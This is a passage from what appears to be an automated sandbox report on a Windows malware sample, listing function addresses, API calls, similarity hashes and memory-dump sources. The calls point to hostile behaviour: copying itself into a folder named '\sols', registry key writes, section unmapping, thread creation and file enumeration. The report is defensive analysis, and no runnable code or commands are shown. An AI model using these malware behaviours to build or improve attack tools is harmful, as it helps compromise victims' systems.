				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
